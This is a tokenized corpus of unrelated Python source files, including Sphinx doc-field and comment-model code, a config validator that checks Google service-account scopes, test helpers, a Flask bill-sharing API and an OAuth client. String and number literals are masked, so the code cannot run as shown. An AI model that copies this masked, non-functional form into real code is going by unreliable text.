<EOL> is_grouped = True <EOL> list_type = nodes . bullet_list <EOL> def __init__ ( self , name , names = ( ) , label = None , rolename = None , <EOL> can_collapse = False ) : <EOL> Field . __init__ ( self , name , names , label , True , rolename ) <EOL> self . can_collapse = can_collapse <EOL> def make_field ( self , types , domain , items ) : <EOL> fieldname = nodes . field_name ( '<STR_LIT>' , self . label ) <EOL> listnode = self . list_type ( ) <EOL> for fieldarg , content in items : <EOL> par = nodes . paragraph ( ) <EOL> par += self . make_xref ( self . rolename , domain , fieldarg , <EOL> addnodes . literal_strong ) <EOL> par += nodes . Text ( '<STR_LIT>' ) <EOL> par += content <EOL> listnode += nodes . list_item ( '<STR_LIT>' , par ) <EOL> if len ( items ) == <NUM_LIT:1> and self . can_collapse : <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , listnode [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , listnode ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> class TypedField ( GroupedField ) : <EOL> """<STR_LIT>""" <EOL> is_typed = True <EOL> def __init__ ( self , name , names = ( ) , typenames = ( ) , label = None , <EOL> rolename = None , typerolename = None , can_collapse = False ) : <EOL> GroupedField . __init__ ( self , name , names , label , rolename , can_collapse ) <EOL> self . typenames = typenames <EOL> self . typerolename = typerolename <EOL> def make_field ( self , types , domain , items ) : <EOL> def handle_item ( fieldarg , content ) : <EOL> par = nodes . paragraph ( ) <EOL> par += self . make_xref ( self . rolename , domain , fieldarg , <EOL> addnodes . literal_strong ) <EOL> if fieldarg in types : <EOL> par += nodes . Text ( '<STR_LIT>' ) <EOL> fieldtype = types . pop ( fieldarg ) <EOL> if len ( fieldtype ) == <NUM_LIT:1> and isinstance ( fieldtype [ <NUM_LIT:0> ] , nodes . Text ) : <EOL> typename = u'<STR_LIT>' . join ( n . astext ( ) for n in fieldtype ) <EOL> par += self . make_xref ( self . typerolename , domain , typename , <EOL> addnodes . literal_emphasis ) <EOL> else : <EOL> par += fieldtype <EOL> par += nodes . Text ( '<STR_LIT:)>' ) <EOL> par += nodes . Text ( '<STR_LIT>' ) <EOL> par += content <EOL> return par <EOL> fieldname = nodes . field_name ( '<STR_LIT>' , self . label ) <EOL> if len ( items ) == <NUM_LIT:1> and self . can_collapse : <EOL> fieldarg , content = items [ <NUM_LIT:0> ] <EOL> bodynode = handle_item ( fieldarg , content ) <EOL> else : <EOL> bodynode = self . list_type ( ) <EOL> for fieldarg , content in items : <EOL> bodynode += nodes . list_item ( '<STR_LIT>' , handle_item ( fieldarg , content ) ) <EOL> fieldbody = nodes . field_body ( '<STR_LIT>' , bodynode ) <EOL> return nodes . field ( '<STR_LIT>' , fieldname , fieldbody ) <EOL> class DocFieldTransformer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , directive ) : <EOL> self . domain = directive . domain <EOL> if '<STR_LIT>' not in directive . __class__ . __dict__ : <EOL> directive . __class__ . _doc_field_type_map = self . preprocess_fieldtypes ( directive . __class__ . doc_field_types ) <EOL> self . typemap = directive . _doc_field_type_map <EOL> def preprocess_fieldtypes ( self , types ) : <EOL> typemap = { } <EOL> for fieldtype in types : <EOL> for name in fieldtype . names : <EOL> typemap [ name ] = fieldtype , False <EOL> if fieldtype . is_typed : <EOL> for name in fieldtype . typenames : <EOL> typemap [ name ] = fieldtype , True <EOL> return typemap <EOL> def transform_all ( self , node ) : <EOL> """<STR_LIT>""" <EOL> for child in node : <EOL> if isinstance ( child , nodes . field_list ) : <EOL> self . transform ( child ) <EOL> def transform ( self , node ) : <EOL> """<STR_LIT>""" <EOL> typemap = self . typemap <EOL> entries = [ ] <EOL> groupindices = { } <EOL> types = { } <EOL> for field in node : <EOL> fieldname , fieldbody = field <EOL> try : <EOL> fieldtype , fieldarg = fieldname . astext ( ) . split ( None , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> fieldtype , fieldarg = fieldname . astext ( ) , '<STR_LIT>' <EOL> typedesc , is_typefield = typemap . get ( fieldtype , ( None , None ) ) <EOL> if typedesc is None or typedesc . has_arg != bool ( fieldarg ) : <EOL> new_fieldname = fieldtype [ <NUM_LIT:0> : <NUM_LIT:1> ] . upper ( ) + fieldtype [ <NUM_LIT:1> : ] <EOL> if fieldarg : <EOL> new_fieldname += '<STR_LIT:U+0020>' + fieldarg <EOL> fieldname [ <NUM_LIT:0> ] = nodes . Text ( new_fieldname ) <EOL> entries . append ( field ) <EOL> continue <EOL> typename = typedesc . name <EOL> if _is_single_paragraph ( fieldbody ) : <EOL> content = fieldbody . children [ <NUM_LIT:0> ] . children <EOL> else : <EOL> content = fieldbody . children <EOL> if is_typefield : <EOL> content = [ n for n in content if isinstance ( n , nodes . Inline ) or <EOL> isinstance ( n , nodes . Text ) ] <EOL> if content : <EOL> types . setdefault ( typename , { } ) [ fieldarg ] = content <EOL> continue <EOL> if typedesc . is_typed : <EOL> try : <EOL> argtype , argname = fieldarg . split ( None , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> types . setdefault ( typename , { } ) [ argname ] = [ nodes . Text ( argtype ) ] <EOL> fieldarg = argname <EOL> translatable_content = nodes . inline ( fieldbody . rawsource , <EOL> translatable = True ) <EOL> translatable_content . source = fieldbody . parent . source <EOL> translatable_content . line = fieldbody . parent . line <EOL> translatable_content += content <EOL> if typedesc . is_grouped : <EOL> if typename in groupindices : <EOL> group = entries [ groupindices [ typename ] ] <EOL> else : <EOL> groupindices [ typename ] = len ( entries ) <EOL> group = [ typedesc , [ ] ] <EOL> entries . append ( group ) <EOL> entry = typedesc . make_entry ( fieldarg , [ translatable_content ] ) <EOL> group [ <NUM_LIT:1> ] . append ( entry ) <EOL> else : <EOL> entry = typedesc . make_entry ( fieldarg , [ translatable_content ] ) <EOL> entries . append ( [ typedesc , entry ] ) <EOL> new_list = nodes . field_list ( ) <EOL> for entry in entries : <EOL> if isinstance ( entry , nodes . field ) : <EOL> new_list += entry <EOL> else : <EOL> fieldtype , content = entry <EOL> fieldtypes = types . get ( fieldtype . name , { } ) <EOL> new_list += fieldtype . make_field ( fieldtypes , self . domain , <EOL> content ) <EOL> node . replace_self ( new_list ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from sqlalchemy import Column , Integer , Text , String , Boolean , ForeignKey , DateTime <EOL> from sqlalchemy . orm import relation , sessionmaker , aliased <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> Base = declarative_base ( ) <EOL> Session = sessionmaker ( ) <EOL> db_prefix = '<STR_LIT>' <EOL> class Node ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = db_prefix + '<STR_LIT>' <EOL> id = Column ( String ( <NUM_LIT:32> ) , primary_key = True ) <EOL> document = Column ( String ( <NUM_LIT> ) , nullable = False ) <EOL> source = Column ( Text , nullable = False ) <EOL> def nested_comments ( self , username , moderator ) : <EOL> """<STR_LIT>""" <EOL> session = Session ( ) <EOL> if username : <EOL> sq = session . query ( CommentVote ) . filter ( CommentVote . username == username ) . subquery ( ) <EOL> cvalias = aliased ( CommentVote , sq ) <EOL> q = session . query ( Comment , cvalias . value ) . outerjoin ( cvalias ) <EOL> else : <EOL> q = session . query ( Comment ) <EOL> q = q . filter ( Comment . path . like ( str ( self . id ) + '<STR_LIT>' ) ) <EOL> if not moderator : <EOL> q = q . filter ( Comment . displayed == True ) <EOL> results = q . order_by ( Comment . path ) . all ( ) <EOL> session . close ( ) <EOL> return self . _nest_comments ( results , username ) <EOL> def _nest_comments ( self , results , username ) : <EOL> """<STR_LIT>""" <EOL> comments = [ ] <EOL> list_stack = [ comments ] <EOL> for r in results : <EOL> if username : <EOL> comment , vote = r <EOL> else : <EOL> comment , vote = ( r , <NUM_LIT:0> ) <EOL> inheritance_chain = comment . path . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] <EOL> if len ( inheritance_chain ) == len ( list_stack ) + <NUM_LIT:1> : <EOL> parent = list_stack [ - <NUM_LIT:1> ] [ - <NUM_LIT:1> ] <EOL> list_stack . append ( parent [ '<STR_LIT>' ] ) <EOL> elif len ( inheritance_chain ) < len ( list_stack ) : <EOL> while len ( inheritance_chain ) < len ( list_stack ) : <EOL> list_stack . pop ( ) <EOL> list_stack [ - <NUM_LIT:1> ] . append ( comment . serializable ( vote = vote ) ) <EOL> return comments <EOL> def __init__ ( self , id , document , source ) : <EOL> self . id = id <EOL> self . document = document <EOL> self . source = source <EOL> class CommentVote ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = db_prefix + '<STR_LIT>' <EOL> username = Column ( String ( <NUM_LIT:64> ) , primary_key = True ) <EOL> comment_id = Column ( Integer , ForeignKey ( db_prefix + '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> value = Column ( Integer , nullable = False ) <EOL> def __init__ ( self , comment_id , username , value ) : <EOL> self . comment_id = comment_id <EOL> self . username = username <EOL> self . value = value <EOL> class Comment ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = db_prefix + '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> rating = Column ( Integer , nullable = False ) <EOL> time = Column ( DateTime , nullable = False ) <EOL> text = Column ( Text , nullable = False ) <EOL> displayed = Column ( Boolean , index = True , default = False ) <EOL> username = Column ( String ( <NUM_LIT:64> ) ) <EOL> proposal = Column ( Text ) <EOL> proposal_diff = Column ( Text ) <EOL> path = Column ( String ( <NUM_LIT> ) , index = True ) <EOL> node_id = Column ( String ( <NUM_LIT:32> ) , ForeignKey ( db_prefix + '<STR_LIT>' ) ) <EOL> node = relation ( Node , backref = "<STR_LIT>" ) <EOL> votes = relation ( CommentVote , backref = "<STR_LIT>" , <EOL> cascade = "<STR_LIT:all>" ) <EOL> def __init__ ( self , text , displayed , username , rating , time , <EOL> proposal , proposal_diff ) : <EOL> self . text = text <EOL> self . displayed = displayed <EOL> self . username = username <EOL> self . rating = rating <EOL> self . time = time <EOL> self . proposal = proposal <EOL> self . proposal_diff = proposal_diff <EOL> def set_path ( self , node_id , parent_id ) : <EOL> """<STR_LIT>""" <EOL> if node_id : <EOL> self . node_id = node_id <EOL> self . path = '<STR_LIT>' % ( node_id , self . id ) <EOL> else : <EOL> session = Session ( ) <EOL> parent_path = session . query ( Comment . path ) . filter ( Comment . id == parent_id ) . one ( ) . path <EOL> session . close ( ) <EOL> self . node_id = parent_path . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> self . path = '<STR_LIT>' % ( parent_path , self . id ) <EOL> def serializable ( self , vote = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> delta = datetime . now ( ) - self . time <EOL> time = { '<STR_LIT>' : self . time . year , <EOL> '<STR_LIT>' : self . time . month , <EOL> '<STR_LIT>' : self . time . day , <EOL> '<STR_LIT>' : self . time . hour , <EOL> '<STR_LIT>' : self . time . minute , <EOL> '<STR_LIT>' : self . time . second , <EOL> '<STR_LIT>' : self . time . isoformat ( ) , <EOL> '<STR_LIT>' : self . pretty_delta ( delta ) } <EOL> path = self . path . split ( '<STR_LIT:.>' ) <EOL> node = path [ <NUM_LIT:0> ] <EOL> if len ( path ) > <NUM_LIT:2> : <EOL> parent = path [ - <NUM_LIT:2> ] <EOL> else : <EOL> parent = None <EOL> return { '<STR_LIT:text>' : self . text , <EOL> '<STR_LIT:username>' : self . username or '<STR_LIT>' , <EOL> '<STR_LIT:id>' : self . id , <EOL> '<STR_LIT>' : node , <EOL> '<STR_LIT>' : parent , <EOL> '<STR_LIT>' : self . rating , <EOL> '<STR_LIT>' : self . displayed , <EOL> '<STR_LIT>' : delta . seconds , <EOL> '<STR_LIT:time>' : time , <EOL> '<STR_LIT>' : vote or <NUM_LIT:0> , <EOL> '<STR_LIT>' : self . proposal_diff , <EOL> '<STR_LIT>' : [ ] } <EOL> def pretty_delta ( self , delta ) : <EOL> """<STR_LIT>""" <EOL> days = delta . days <EOL> seconds = delta . seconds <EOL> hours = seconds / <NUM_LIT> <EOL> minutes = seconds / <NUM_LIT> <EOL> if days == <NUM_LIT:0> : <EOL> if hours == <NUM_LIT:0> : <EOL> dt = ( minutes , '<STR_LIT>' ) <EOL> else : <EOL> dt = ( hours , '<STR_LIT>' ) <EOL> else : <EOL> dt = ( days , '<STR_LIT>' ) <EOL> if dt [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> ret = '<STR_LIT>' % dt <EOL> else : <EOL> ret = '<STR_LIT>' % dt <EOL> return ret </s>
<s> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . dirname ( os . path . abspath ( '<STR_LIT:.>' ) ) ) <EOL> project = '<STR_LIT:test>' <EOL> master_doc = '<STR_LIT:index>' </s>
<s> master_doc = '<STR_LIT:index>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> rst_epilog = '''<STR_LIT>''' </s>
<s> import os <EOL> import re <EOL> import sys <EOL> from configurator import Configurator <EOL> from fetch import fetch <EOL> from fetch import is_google_instance <EOL> from fetch import GOOGLE_INSTANCE_METADATA_URL <EOL> from fetch import GOOGLE_METADATA_URL <EOL> from fetch import GOOGLE_OAUTH_URL <EOL> def _host_regex_token ( ) : <EOL> ip6_group = '<STR_LIT>' <EOL> ip6_full_host_token = '<STR_LIT>' . format ( group = ip6_group ) <EOL> ip6_abbrev_host_token = '<STR_LIT>' . format ( group = ip6_group ) <EOL> ip6_host_token = '<STR_LIT>' . format ( <EOL> full = ip6_full_host_token , abbrev = ip6_abbrev_host_token ) <EOL> ip4_host_token = '<STR_LIT>' <EOL> name_host_token = '<STR_LIT>' <EOL> host_token = '<STR_LIT>' . format ( <EOL> ip4 = ip4_host_token , ip6 = ip6_host_token , name = name_host_token ) <EOL> return host_token <EOL> class ValidateConfig ( object ) : <EOL> @ property <EOL> def errors ( self ) : <EOL> return self . __errors <EOL> @ property <EOL> def warnings ( self ) : <EOL> return self . __warnings <EOL> def __init__ ( self , configurator = None ) : <EOL> if not configurator : <EOL> configurator = Configurator ( ) <EOL> self . __bindings = configurator . bindings <EOL> self . __user_config_dir = configurator . user_config_dir <EOL> self . __installation_config_dir = configurator . installation_config_dir <EOL> self . __warnings = [ ] <EOL> self . __errors = [ ] <EOL> def validate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . verify_at_least_one_provider_enabled ( ) <EOL> self . verify_google_scopes ( ) <EOL> self . verify_external_dependencies ( ) <EOL> self . verify_security ( ) <EOL> found_local = False <EOL> for ymldir in [ self . __user_config_dir , self . __installation_config_dir ] : <EOL> yml_path = os . path . join ( ymldir , '<STR_LIT>' ) <EOL> if not os . path . exists ( yml_path ) : <EOL> continue <EOL> found_local = True <EOL> if not found_local : <EOL> self . __warnings . append ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> user = self . __user_config_dir , <EOL> install = self . __installation_config_dir ) ) <EOL> if self . __warnings : <EOL> print ( '<STR_LIT>' <EOL> . format ( path = yml_path , warnings = '<STR_LIT>' . join ( self . __warnings ) ) ) <EOL> if not self . __errors : <EOL> print '<STR_LIT>' . format ( path = yml_path ) <EOL> return True <EOL> else : <EOL> print ( '<STR_LIT>' <EOL> . format ( path = yml_path , errors = '<STR_LIT>' . join ( self . __errors ) ) ) <EOL> return False <EOL> def check_validate ( self ) : <EOL> """<STR_LIT>""" <EOL> ok = self . validate ( ) <EOL> if not ok : <EOL> msg = '<STR_LIT>' . format ( <EOL> errors = '<STR_LIT>' . join ( self . __errors ) ) <EOL> raise ValueError ( msg ) <EOL> def is_reference ( self , value ) : <EOL> """<STR_LIT>""" <EOL> return isinstance ( value , basestring ) and value . startswith ( '<STR_LIT>' ) <EOL> def verify_true_false ( self , name ) : <EOL> """<STR_LIT>""" <EOL> value = self . __bindings . get ( name ) <EOL> if self . is_reference ( value ) : <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if isinstance ( value , bool ) : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( name = name , value = value ) ) <EOL> return False <EOL> def verify_baseUrl ( self , name , required , scheme_optional = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> value = self . __bindings . get ( name ) <EOL> except KeyError : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if self . is_reference ( value ) : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> scheme_token = '<STR_LIT>' <EOL> host_token = _host_regex_token ( ) <EOL> port_token = '<STR_LIT>' <EOL> path_token = '<STR_LIT>' <EOL> url_re = re . compile ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:$>' <EOL> . format ( <EOL> scheme = scheme_token , <EOL> scheme_optional = '<STR_LIT:?>' if scheme_optional else '<STR_LIT>' , <EOL> host = host_token , <EOL> port = port_token , <EOL> path = path_token <EOL> ) ) <EOL> match = url_re . match ( value ) <EOL> return match != None <EOL> def verify_host ( self , name , required ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> value = self . __bindings . get ( name ) <EOL> except KeyError : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if self . is_reference ( value ) : <EOL> if not required : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> host_token = _host_regex_token ( ) <EOL> host_regex = '<STR_LIT>' . format ( host = host_token ) <EOL> if not value : <EOL> if not required : <EOL> return True <EOL> else : <EOL> self . __errors . append ( <EOL> '<STR_LIT>' . format ( name = name ) ) <EOL> return False <EOL> if re . match ( host_regex , value ) : <EOL> return True <EOL> self . __errors . append ( <EOL> '<STR_LIT>' . format ( <EOL> value = value , regex = host_regex ) ) <EOL> return False <EOL> def verify_at_least_one_provider_enabled ( self ) : <EOL> providers = self . __bindings . get ( '<STR_LIT>' ) <EOL> for name , attrs in providers . items ( ) : <EOL> if attrs . get ( '<STR_LIT>' , False ) : <EOL> return True <EOL> self . __errors . append ( '<STR_LIT>' ) <EOL> return False <EOL> def verify_google_scopes ( self ) : <EOL> """<STR_LIT>""" <EOL> if not is_google_instance ( ) : <EOL> return <EOL> if not self . verify_true_false ( '<STR_LIT>' ) : <EOL> return <EOL> if not self . __bindings . get ( '<STR_LIT>' ) : <EOL> return <EOL> result = fetch ( <EOL> GOOGLE_INSTANCE_METADATA_URL + '<STR_LIT>' , google = True ) <EOL> service_accounts = result . content if result . ok ( ) else '<STR_LIT>' <EOL> required_scopes = [ GOOGLE_OAUTH_URL + '<STR_LIT>' ] <EOL> found_scopes = [ ] <EOL> for account in filter ( bool , service_accounts . split ( '<STR_LIT:\n>' ) ) : <EOL> if account [ - <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> account = account [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> result = fetch ( <EOL> os . path . join ( GOOGLE_INSTANCE_METADATA_URL , '<STR_LIT>' , <EOL> os . path . basename ( account ) , '<STR_LIT>' ) , <EOL> google = True ) <EOL> have = str ( result . content ) <EOL> if have . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> found_scopes . extend ( required_scopes ) <EOL> for scope in required_scopes : <EOL> if have . find ( scope ) >= <NUM_LIT:0> : <EOL> found_scopes . append ( scope ) <EOL> for scope in required_scopes : <EOL> if not scope in found_scopes : <EOL> self . __errors . append ( <EOL> '<STR_LIT>' . format ( scope = scope ) ) <EOL> def verify_external_dependencies ( self ) : <EOL> """<STR_LIT>""" <EOL> ok = self . verify_host ( '<STR_LIT>' , required = False ) <EOL> ok = self . verify_host ( '<STR_LIT>' , required = False ) and ok <EOL> return ok <EOL> def verify_user_access_only ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if not path or not os . path . exists ( path ) : <EOL> return True <EOL> stat = os . stat ( path ) <EOL> if stat . st_mode & <NUM_LIT:0> <NUM_LIT> : <EOL> self . __errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( path = path , <EOL> mode = '<STR_LIT>' % ( stat . st_mode & <NUM_LIT> ) ) ) <EOL> return False <EOL> return True <EOL> def verify_security ( self ) : <EOL> """<STR_LIT>""" <EOL> ok = True <EOL> for path in [ <EOL> self . __bindings . get ( '<STR_LIT>' ) , <EOL> os . path . join ( self . __user_config_dir , '<STR_LIT>' ) , <EOL> os . path . join ( self . __installation_config_dir , '<STR_LIT>' ) , <EOL> os . path . join ( os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' ) ] : <EOL> ok = self . verify_user_access_only ( path ) and ok <EOL> return ok <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( <NUM_LIT:0> if ValidateConfig ( ) . validate ( ) else - <NUM_LIT:1> ) </s>
<s> import collections <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> import base64 <EOL> import six <EOL> import webtest <EOL> from daybed import __version__ <EOL> from daybed . tokens import get_hawk_credentials <EOL> class PrefixedRequestClass ( webtest . app . TestRequest ) : <EOL> @ classmethod <EOL> def blank ( cls , path , * args , ** kwargs ) : <EOL> path = '<STR_LIT>' % ( __version__ . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] , path ) <EOL> return webtest . app . TestRequest . blank ( path , * args , ** kwargs ) <EOL> class BaseWebTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . app = webtest . TestApp ( "<STR_LIT>" , relative_to = '<STR_LIT:.>' ) <EOL> self . app . RequestClass = PrefixedRequestClass <EOL> self . db = self . app . app . registry . backend <EOL> self . indexer = self . app . app . registry . index <EOL> token , self . credentials = get_hawk_credentials ( ) <EOL> self . db . store_credentials ( token , self . credentials ) <EOL> auth_password = base64 . b64encode ( <EOL> ( u'<STR_LIT>' % ( self . credentials [ '<STR_LIT:id>' ] , <EOL> self . credentials [ '<STR_LIT:key>' ] ) ) . encode ( '<STR_LIT:ascii>' ) ) . strip ( ) . decode ( '<STR_LIT:ascii>' ) <EOL> self . headers = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( auth_password ) , <EOL> } <EOL> def tearDown ( self ) : <EOL> self . db . delete_db ( ) <EOL> self . indexer . delete_indices ( ) <EOL> def force_unicode ( data ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( data , six . string_types ) : <EOL> return six . text_type ( data ) <EOL> elif isinstance ( data , collections . Mapping ) : <EOL> return dict ( map ( force_unicode , six . iteritems ( data ) ) ) <EOL> elif isinstance ( data , collections . Iterable ) : <EOL> return type ( data ) ( map ( force_unicode , data ) ) <EOL> else : <EOL> return data </s>
<s> from flask import Blueprint , request <EOL> from flask . ext . rest import RESTResource , need_auth <EOL> from models import db , Project , Person , Bill <EOL> from forms import ( ProjectForm , EditProjectForm , MemberForm , <EOL> get_billform_for ) <EOL> api = Blueprint ( "<STR_LIT>" , __name__ , url_prefix = "<STR_LIT>" ) <EOL> def check_project ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> auth = request . authorization <EOL> if auth and "<STR_LIT>" in kwargs and auth . username == kwargs [ "<STR_LIT>" ] : <EOL> project = Project . query . get ( auth . username ) <EOL> if project and project . password == auth . password : <EOL> return project <EOL> return False <EOL> class ProjectHandler ( object ) : <EOL> def add ( self ) : <EOL> form = ProjectForm ( csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> project = form . save ( ) <EOL> db . session . add ( project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT> , project . id <EOL> return <NUM_LIT> , form . errors <EOL> @ need_auth ( check_project , "<STR_LIT>" ) <EOL> def get ( self , project ) : <EOL> return <NUM_LIT:200> , project <EOL> @ need_auth ( check_project , "<STR_LIT>" ) <EOL> def delete ( self , project ) : <EOL> db . session . delete ( project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , "<STR_LIT>" <EOL> @ need_auth ( check_project , "<STR_LIT>" ) <EOL> def update ( self , project ) : <EOL> form = EditProjectForm ( csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> form . update ( project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , "<STR_LIT>" <EOL> return <NUM_LIT> , form . errors <EOL> class MemberHandler ( object ) : <EOL> def get ( self , project , member_id ) : <EOL> member = Person . query . get ( member_id , project ) <EOL> if not member or member . project != project : <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> return <NUM_LIT:200> , member <EOL> def list ( self , project ) : <EOL> return <NUM_LIT:200> , project . members <EOL> def add ( self , project ) : <EOL> form = MemberForm ( project , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> member = Person ( ) <EOL> form . save ( project , member ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT> , member . id <EOL> return <NUM_LIT> , form . errors <EOL> def update ( self , project , member_id ) : <EOL> form = MemberForm ( project , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> member = Person . query . get ( member_id , project ) <EOL> form . save ( project , member ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , member <EOL> return <NUM_LIT> , form . errors <EOL> def delete ( self , project , member_id ) : <EOL> if project . remove_member ( member_id ) : <EOL> return <NUM_LIT:200> , "<STR_LIT:OK>" <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> class BillHandler ( object ) : <EOL> def get ( self , project , bill_id ) : <EOL> bill = Bill . query . get ( project , bill_id ) <EOL> if not bill : <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> return <NUM_LIT:200> , bill <EOL> def list ( self , project ) : <EOL> return project . get_bills ( ) . all ( ) <EOL> def add ( self , project ) : <EOL> form = get_billform_for ( project , True , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> bill = Bill ( ) <EOL> form . save ( bill , project ) <EOL> db . session . add ( bill ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT> , bill . id <EOL> return <NUM_LIT> , form . errors <EOL> def update ( self , project , bill_id ) : <EOL> form = get_billform_for ( project , True , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> bill = Bill . query . get ( project , bill_id ) <EOL> form . save ( bill , project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , bill . id <EOL> return <NUM_LIT> , form . errors <EOL> def delete ( self , project , bill_id ) : <EOL> bill = Bill . query . delete ( project , bill_id ) <EOL> db . session . commit ( ) <EOL> if not bill : <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> return <NUM_LIT:200> , "<STR_LIT:OK>" <EOL> project_resource = RESTResource ( <EOL> name = "<STR_LIT>" , <EOL> route = "<STR_LIT>" , <EOL> app = api , <EOL> actions = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> handler = ProjectHandler ( ) ) <EOL> member_resource = RESTResource ( <EOL> name = "<STR_LIT>" , <EOL> inject_name = "<STR_LIT>" , <EOL> route = "<STR_LIT>" , <EOL> app = api , <EOL> handler = MemberHandler ( ) , <EOL> authentifier = check_project ) <EOL> bill_resource = RESTResource ( <EOL> name = "<STR_LIT>" , <EOL> inject_name = "<STR_LIT>" , <EOL> route = "<STR_LIT>" , <EOL> app = api , <EOL> handler = BillHandler ( ) , <EOL> authentifier = check_project ) </s>
<s> import logging <EOL> import os <EOL> from flask import Flask <EOL> from harold . conf import HaroldConfiguration <EOL> from harold . plugins . database import DatabaseConfig <EOL> import flask_github <EOL> app = Flask ( __name__ ) <EOL> config = HaroldConfiguration ( os . environ [ "<STR_LIT>" ] ) <EOL> _db_config = DatabaseConfig ( config ) <EOL> app . config [ "<STR_LIT>" ] = _db_config . connection_string <EOL> app . config . from_envvar ( "<STR_LIT>" ) <EOL> github = flask_github . GitHub ( app ) <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> import salon . views </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> """<STR_LIT>""" <EOL> from . base import Client <EOL> from . . parameters import prepare_grant_uri <EOL> from . . parameters import parse_implicit_response <EOL> class MobileApplicationClient ( Client ) : <EOL> """<STR_LIT>""" <EOL> def prepare_request_uri ( self , uri , redirect_uri = None , scope = None , <EOL> state = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return prepare_grant_uri ( uri , self . client_id , '<STR_LIT>' , <EOL> redirect_uri = redirect_uri , state = state , scope = scope , ** kwargs ) <EOL> def parse_request_uri_response ( self , uri , state = None , scope = None ) : <EOL> """<STR_LIT>""" <EOL> self . token = parse_implicit_response ( uri , state = state , scope = scope ) <EOL> self . _populate_attributes ( self . token ) <EOL> return self . token </s>
